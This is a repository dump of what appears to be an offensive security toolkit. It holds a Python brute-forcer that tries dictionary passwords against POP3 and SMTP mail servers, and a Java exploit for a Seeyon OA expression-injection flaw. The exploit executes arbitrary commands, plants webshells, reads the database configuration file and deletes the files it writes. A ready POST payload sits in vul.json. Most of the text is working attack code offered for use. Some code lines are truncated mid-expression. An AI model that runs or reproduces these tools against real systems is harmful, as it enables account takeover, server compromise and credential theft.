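        print("[-]密码正确" + "账户名:" + username + "密码:" + password)
        return True
    except poplib.error_proto:
        # -ERR from the server on USER or PASS: credentials rejected.
        print("[-]错误信息:密码错误!")
        return False
    except OSError:
        print("[-]错误信息:服务器错误!")
        return False
    finally:
        _closeQuietly(pop3Server)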
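# One lock shared by every worker thread of this module: run() holds it for the
# whole of each login() call, so guesses are serialised, not parallel.
threadLock = threading.Lock()
# A private loop instead of asyncio.get_event_loop(): called at import time with
# no loop running, get_event_loop() is deprecated (DeprecationWarning since 3.12)
# and would bind this module to the main thread's loop although run() drives it
# from a worker thread. run_until_complete() works on a loop that is not current.
loop = asyncio.new_event_loop()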
--------------------------------------------------------------------------------
/MailBurst/lib/smtpBurst.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import smtplib
3 | import threading
4 | import asyncio
5 | import time
6 |
7 |
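class smtpBurst(threading.Thread):
    """Worker thread that tries every username/password pair against one SMTP server.

    Each guess goes through the module-level ``login`` coroutine, run to
    completion on the module-level ``loop`` while ``threadLock`` is held, so
    guesses are serialised rather than concurrent; the thread only keeps the
    caller's main thread free.
    """

    def __init__(self, mailAddr, mailPort, userLines, passLines):
        threading.Thread.__init__(self)
        self.mailAddr = mailAddr    # SMTP host name or address
        self.mailPort = mailPort    # TCP port of the plaintext SMTP service
        self.userLines = userLines  # dictionary lines; login() strips their newlines
        self.passLines = passLines

    def run(self):
        # Probe once so an unreachable server is reported before the loop starts,
        # and QUIT that probe connection instead of leaking its socket.
        try:
            probe = smtplib.SMTP(self.mailAddr, self.mailPort)
        except (smtplib.SMTPException, OSError):
            print("[-]错误信息:服务器错误!")
            return
        try:
            probe.quit()
        except (smtplib.SMTPException, OSError):
            probe.close()  # best effort only; each guess opens its own connection
        if len(self.userLines) < 1 or len(self.passLines) < 1:
            print("[-]错误信息:字典文件中无内容,请检查!")
            return
        for user in self.userLines:
            for pwd in self.passLines:
                # "with" releases the lock even if login() raises; the bare
                # acquire()/release() pair left it held forever on an exception.
                with threadLock:
                    loop.run_until_complete(login(self.mailAddr, self.mailPort, user, pwd))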
31 |
32 |
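def _closeQuietly(smtpServer):
    """Best-effort QUIT so every attempt releases its socket; errors are ignored."""
    try:
        smtpServer.quit()
    except (smtplib.SMTPException, OSError):
        smtpServer.close()


async def login(mailAddr, mailPort, username, password):
    """Try one username/password pair against the SMTP server (AUTH).

    Strips the newline the dictionary lines carry, connects, upgrades to TLS
    with STARTTLS when the server advertises it, then calls ``login``. Prints
    the result in the tool's usual format and returns True on success, False
    otherwise. Only an authentication error counts as a wrong password; a
    server that does not offer AUTH, refuses EHLO/HELO or drops the connection
    is reported as a server error instead.

    STARTTLS is attempted because many servers only advertise AUTH after the
    upgrade, and it keeps the guessed credentials off the wire in clear text.
    No ssl context is passed, so the stdlib default applies and the server
    certificate is NOT verified - acceptable for opportunistic encryption in a
    testing tool, but confirm that is what is wanted.

    Declared ``async`` only because the callers drive it through
    ``loop.run_until_complete``; smtplib is blocking and nothing here awaits.
    The previous version did ``await smtplib.SMTP(...)``, which raises
    TypeError because an SMTP object is not awaitable; its bare ``except`` then
    reported every attempt - the right password included - as a wrong one.
    """
    username = username.replace("\n", "")
    password = password.replace("\n", "")
    try:
        smtpServer = smtplib.SMTP(mailAddr, mailPort)
    except (smtplib.SMTPException, OSError):
        print("[-]错误信息:服务器错误!")
        return False
    try:
        smtpServer.ehlo()
        if smtpServer.has_extn("starttls"):
            smtpServer.starttls()
        smtpServer.login(username, password)
        print("[-]密码正确" + "账户名:" + username + "密码:" + password)
        return True
    except smtplib.SMTPAuthenticationError:
        print("[-]错误信息:密码错误!")
        return False
    except (smtplib.SMTPException, OSError):
        # AUTH not offered, EHLO/HELO refused, TLS failure, connection dropped, ...
        print("[-]错误信息:服务器错误!")
        return False
    finally:
        _closeQuietly(smtpServer)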
42 |
43 |
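# One lock shared by every worker thread of this module: run() holds it for the
# whole of each login() call, so guesses are serialised, not parallel.
threadLock = threading.Lock()
# A private loop instead of asyncio.get_event_loop(): called at import time with
# no loop running, get_event_loop() is deprecated (DeprecationWarning since 3.12)
# and would bind this module to the main thread's loop although run() drives it
# from a worker thread. run_until_complete() works on a loop that is not current.
loop = asyncio.new_event_loop()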
46 |
--------------------------------------------------------------------------------
/MailBurst/lib/smtpsBrust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import smtplib
3 | import threading
4 | import asyncio
5 |
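class smtpsBurst(threading.Thread):
    """Worker thread that tries every username/password pair against one SMTPS server.

    Each guess goes through the module-level ``login`` coroutine, run to
    completion on the module-level ``loop`` while ``threadLock`` is held, so
    guesses are serialised rather than concurrent; the thread only keeps the
    caller's main thread free.
    """

    def __init__(self, mailAddr, mailPort, userLines, passLines):
        threading.Thread.__init__(self)
        self.mailAddr = mailAddr    # SMTPS host name or address
        self.mailPort = mailPort    # TCP port of the implicit-TLS SMTP service
        self.userLines = userLines  # dictionary lines; login() strips their newlines
        self.passLines = passLines

    def run(self):
        # Probe once so an unreachable server is reported before the loop starts,
        # and QUIT that probe connection instead of leaking its socket. No ssl
        # context is passed, so the stdlib default applies: the server
        # certificate is not verified.
        try:
            probe = smtplib.SMTP_SSL(self.mailAddr, self.mailPort)
        except (smtplib.SMTPException, OSError):
            print("[-]错误信息:服务器错误!")
            return
        try:
            probe.quit()
        except (smtplib.SMTPException, OSError):
            probe.close()  # best effort only; each guess opens its own connection
        if len(self.userLines) < 1 or len(self.passLines) < 1:
            print("[-]错误信息:字典文件中无内容,请检查!")
            return
        for user in self.userLines:
            for pwd in self.passLines:
                # "with" releases the lock even if login() raises; the bare
                # acquire()/release() pair left it held forever on an exception.
                with threadLock:
                    loop.run_until_complete(login(self.mailAddr, self.mailPort, user, pwd))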
28 |
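def _closeQuietly(smtpServer):
    """Best-effort QUIT so every attempt releases its socket; errors are ignored."""
    try:
        smtpServer.quit()
    except (smtplib.SMTPException, OSError):
        smtpServer.close()


async def login(mailAddr, mailPort, username, password):
    """Try one username/password pair against the SMTPS server (AUTH over TLS).

    Strips the newline the dictionary lines carry, prints the result in the
    tool's usual format and returns True on success, False otherwise. Only an
    authentication error counts as a wrong password; a server that does not
    offer AUTH, refuses EHLO/HELO, fails the TLS handshake or drops the
    connection is reported as a server error instead.

    The connection is made without an ssl context, so the stdlib default
    applies and the server certificate is NOT verified: anyone who can
    intercept the connection can also read the credentials being tested.

    Declared ``async`` only because the callers drive it through
    ``loop.run_until_complete``; smtplib is blocking and nothing here awaits.
    The previous version did ``await smtplib.SMTP_SSL(...)``, which raises
    TypeError because the object is not awaitable; its bare ``except`` then
    reported every attempt - the right password included - as a wrong one.
    """
    username = username.replace("\n", "")
    password = password.replace("\n", "")
    try:
        smtpServer = smtplib.SMTP_SSL(mailAddr, mailPort)
    except (smtplib.SMTPException, OSError):
        print("[-]错误信息:服务器错误!")
        return False
    try:
        smtpServer.login(username, password)
        print("[-]密码正确" + "账户名:" + username + "密码:" + password)
        return True
    except smtplib.SMTPAuthenticationError:
        print("[-]错误信息:密码错误!")
        return False
    except (smtplib.SMTPException, OSError):
        # AUTH not offered, EHLO/HELO refused, connection dropped, ...
        print("[-]错误信息:服务器错误!")
        return False
    finally:
        _closeQuietly(smtpServer)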
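# One lock shared by every worker thread of this module: run() holds it for the
# whole of each login() call, so guesses are serialised, not parallel.
threadLock = threading.Lock()
# A private loop instead of asyncio.get_event_loop(): called at import time with
# no loop running, get_event_loop() is deprecated (DeprecationWarning since 3.12)
# and would bind this module to the main thread's loop although run() drives it
# from a worker thread. run_until_complete() works on a loop that is not current.
loop = asyncio.new_event_loop()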
--------------------------------------------------------------------------------
/PIC/BkG.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/PIC/BkG.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ATT-CK-Tools-library
2 |
3 | 
4 |
5 | # 声明
6 | 本项目工具仅供测试使用,请勿用于违法用途,否则后果自负!
7 |
--------------------------------------------------------------------------------
/SeeyonExp/README.md:
--------------------------------------------------------------------------------
1 | # SeeyonExp
2 |
3 | ### 0x00 开发日志
4 |
5 | 2021-3-13 V0.9 增加多个受影响版本,修复HTTPS无法指定端口bug
6 |
7 | 2021-2-2 V0.8 新增影响版本v6.1
8 |
9 | 2021-1-10 V0.7 增加识别版本后无损检测漏洞功能,有那么点漏扫的意思
10 |
11 | 2020-11-11 V0.6 增加数据库配置文件读取功能
12 |
13 | 2020-11-10 V0.5 增加回显流量加密功能,Base64与ascii结合,Base65
14 |
15 | 2020-11-2 V0.4 解决命令执行for循环无法执行for之后Java代码的bug,分号的神奇作用
16 |
17 | 2020-10-30 V0.3 增加文件上传功能,Base64不编码写入不了,黑名单校验
18 |
19 | 2020-10-22 V0.2 命令可以在windows与Linux下执行,并支持https
20 |
21 | 2020-10-20 V0.1 根据POC写出初步利用,可以执行命令,但是仅在windows与http下
22 |
23 | ### 0x01 使用方法
24 |
25 | 无损检验是否存在漏洞:java -jar seeyon.jar scan http/https://xxxx.com:port/seeyon
26 |
27 | 执行命令:java -jar seeyon.jar http/https://xxxx.com:port/seeyon cmd
28 |
29 | 写入shell:java -jar seeyon.jar http/https://xxxx.com:port/seeyon shell srcFile desFile
30 |
31 | 读取数据库配置文件:java -jar seeyon.jar http/https://xxxx.com:port/seeyon dataConf
32 |
33 | 流量解码:java -jar seeyon.jar decode ciphertext
34 |
35 | 流量编码:java -jar seeyon.jar encode Plaintext
36 |
37 | 使用参考:https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ
38 |
--------------------------------------------------------------------------------
/SeeyonExp/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | groupId
8 | Seeyon
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 | org.apache.maven.plugins
14 | maven-compiler-plugin
15 |
16 | 7
17 | 7
18 |
19 |
20 |
21 |
22 |
23 |
24 | commons-codec
25 | commons-codec
26 | 1.15
27 |
28 |
29 | org.apache.httpcomponents
30 | httpclient
31 | 4.5.13
32 |
33 |
34 | org.json
35 | json
36 | 20180813
37 |
38 |
39 |
--------------------------------------------------------------------------------
/SeeyonExp/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: ExpMain
3 |
4 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: ExpMain
3 |
4 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/java/DataConf.java:
--------------------------------------------------------------------------------
1 | import java.util.UUID;
2 |
3 | public class DataConf {
4 | public void DataConf(String oaUrl) throws Exception {
5 | HTTPClient httpClient = new HTTPClient();
6 | String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip";
7 | UUID uuid = UUID.randomUUID();
8 | String uuidStr = uuid.toString();
9 | uuidStr = uuidStr.replace("-", "");
10 | String getUrl = oaUrl + "/" + uuidStr + ".txt";
11 | String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt";
12 | String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt";
13 | String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt";
14 | String winReadDadaConf = "cd ../../base/conf & type datasourceCtp.properties";
15 | String linReadDadaConf = "cat ../../base/conf/datasourceCtp.properties";
16 | String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + winReadDadaConf + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + linReadDadaConf + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();System.out.println(sbStr);sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i=0){
16 | byteOut.write(buffer,0,n);
17 | }
18 | return byteOut.toString();
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/java/Encoder.java:
--------------------------------------------------------------------------------
1 | import java.io.ByteArrayOutputStream;
2 | import java.io.IOException;
3 | import java.net.URLEncoder;
4 | import java.util.zip.GZIPOutputStream;
5 |
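public class Encoder {

    /**
     * GZIP-compresses {@code encodeStr} and URL-encodes the compressed bytes, producing the
     * body format the tool sends with {@code requestCompress=gzip}.
     *
     * The compressed bytes are first turned into a String through ISO-8859-1 (one char per
     * byte) and that String is then URL-encoded as UTF-8, so every byte {@code >= 0x80}
     * comes out as a two-byte UTF-8 sequence, i.e. two {@code %XX} escapes rather than
     * one. That is how the original behaved and is presumably what the receiving side
     * undoes (URL-decode as UTF-8, then ISO-8859-1 back to bytes) - confirm against the
     * decoder before "fixing" it to escape the raw bytes, since that would change the wire
     * format.
     *
     * Differences from the original: the GZIP stream is closed by try-with-resources (the
     * trailer is only written on close, so the bytes are read from {@code byteOut} after the
     * block), and the pointless {@code flush()} after {@code close()} is gone. The output is
     * byte-for-byte the same.
     *
     * @param encodeStr plaintext to send; encoded as UTF-8 before compression
     * @return URL-encoded GZIP stream, containing only {@code A-Z a-z 0-9 - _ . * + %}
     * @throws IOException if compression fails
     */
    public String Encoder(String encodeStr) throws IOException {
        ByteArrayOutputStream byteOut = new ByteArrayOutputStream();
        try (GZIPOutputStream gzipOut = new GZIPOutputStream(byteOut)) {
            gzipOut.write(encodeStr.getBytes("UTF-8"));
        }
        // ISO-8859-1 maps each byte to the char with the same value, nothing is lost here.
        String gzipEnStr = byteOut.toString("iso-8859-1");
        return URLEncoder.encode(gzipEnStr, "UTF-8");
    }
}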
18 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/java/ExecuteCode.java:
--------------------------------------------------------------------------------
1 | import java.util.UUID;
2 |
3 | public class ExecuteCode {
4 | public void ExecuteCode(String oaUrl,String cmd) throws Exception {
5 | HTTPClient httpClient = new HTTPClient();
6 | UUID uuid = UUID.randomUUID();
7 | String uuidStr = uuid.toString();
8 | uuidStr = uuidStr.replace("-", "");
9 | String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip";
10 | String getUrl = oaUrl + "/" + uuidStr + ".txt";
11 | String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt";
12 | String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt";
13 | String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt";
14 | //执行命令
15 | String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + cmd + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + cmd + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i versionsList = versions.toList();
26 | List versionList1 = new ArrayList<>();
27 | for (Object version:versionsList) {
28 | versionList1.add((String)version);
29 | }
30 | if (url.startsWith("http:")){
31 | HttpClient client = new DefaultHttpClient();
32 | HttpGet request = new HttpGet(url);
33 | HttpResponse response = client.execute(request);
34 | String result = EntityUtils.toString(response.getEntity());
35 | if (result != null){
36 | Integer indexVersionFlag = result.lastIndexOf("all-min.css");
37 | String version = result.substring(indexVersionFlag,indexVersionFlag+21);
38 | String[] versionArr = version.split("=");
39 | version = versionArr[1];
40 | version = version.replace("_",".").toLowerCase();
41 | for (String versionString : versionList1) {
42 | if (version.startsWith(versionString.toLowerCase())){
43 | System.out.println("[*]命中影响版本,开始扫描");
44 | String attackUrl="";
45 | for (Object atturl:attUrl) {
46 | attackUrl = url + atturl;
47 | }
48 | Scanner scanner = new Scanner();
49 | System.out.println(scanner.Scanner(poc,attackUrl,method,res));
50 | }
51 | continue;
52 | }
53 | }else {
54 | System.out.println("[!]网页无内容,请检查后重新运行");
55 | }
56 | }else {
57 | CloseableHttpClient client;
58 | URIBuilder uriBuilder = new URIBuilder(url);
59 | int port = uriBuilder.getPort();
60 | if (port != 443){
61 | client = new SSLClient(uriBuilder.getPort());
62 | }else {
63 | client = new SSLClient(443);
64 | }
65 | HttpGet httpGet = new HttpGet(uriBuilder.build());
66 | CloseableHttpResponse response = client.execute(httpGet);
67 | String result = EntityUtils.toString(response.getEntity());
68 | if (result != null) {
69 | Integer indexVersionFlag = result.lastIndexOf("all-min.css");
70 | String version = result.substring(indexVersionFlag,indexVersionFlag+21);
71 | String[] versionArr = version.split("=");
72 | version = versionArr[1];
73 | version = version.replace("_",".").toLowerCase();
74 | for (String versionString : versionList1) {
75 | if (version.startsWith(versionString.toLowerCase())){
76 | System.out.println("[*]命中影响版本,开始扫描");
77 | String attackUrl="";
78 | for (Object atturl:attUrl) {
79 | attackUrl = url + atturl;
80 | }
81 | Scanner scanner = new Scanner();
82 | System.out.println(scanner.Scanner(poc,attackUrl,method,res));
83 | }
84 | continue;
85 | }
86 | }else {
87 | System.out.println("[!]网页无内容,请检查后重新运行");
88 | }
89 | }
90 | }
91 | }
92 |
--------------------------------------------------------------------------------
/SeeyonExp/vul.json:
--------------------------------------------------------------------------------
1 | {
2 | "Vulnerabilities":
3 | [
4 | {
5 | "name": "Seeyon Expression injection",
6 | "ImpactVersion": ["V7.0","V7.1","V8.0","V6.1"],
7 | "url": ["/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"],
8 | "pocMethod": "POST",
9 | "pocContent": "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%C2%8B%C2%AEVO%C3%8B%2F%C3%8A-%C3%8DI%0C%C2%A9%2CHU%C2%B7R0%C3%94Q%C2%80%C2%89%C3%B8%25%C3%A6%C2%82D%C3%94KR%C2%8BK%C3%94%11%C3%82%C2%AE%15%05E%C2%A9%C3%85%C3%85%C2%99%C3%B9y+%C3%89%C3%A0%C2%92%C2%A2%C3%8C%C2%BCt%C2%85%C2%82%C3%84%C2%92%0C%05%5B%05%25C%25%C3%ABZk%C2%90%06%0DM%C3%AB%C2%94%C3%944%C2%85%C3%A2%C2%92%C3%84%C2%92%C3%8Cd%C2%85%C2%8A%C2%8A%0A%0D%C3%8Dj%C3%B5Z%C2%A0%29%40%C2%93%C2%AAAtIQi%C2%AAz%2C%00l%C3%BA%C2%92%C3%AC%C2%80%00%00%00",
10 | "verify": "string",
11 | "Response": "\"message\":null",
12 | }
13 | ]
14 | }
15 |
--------------------------------------------------------------------------------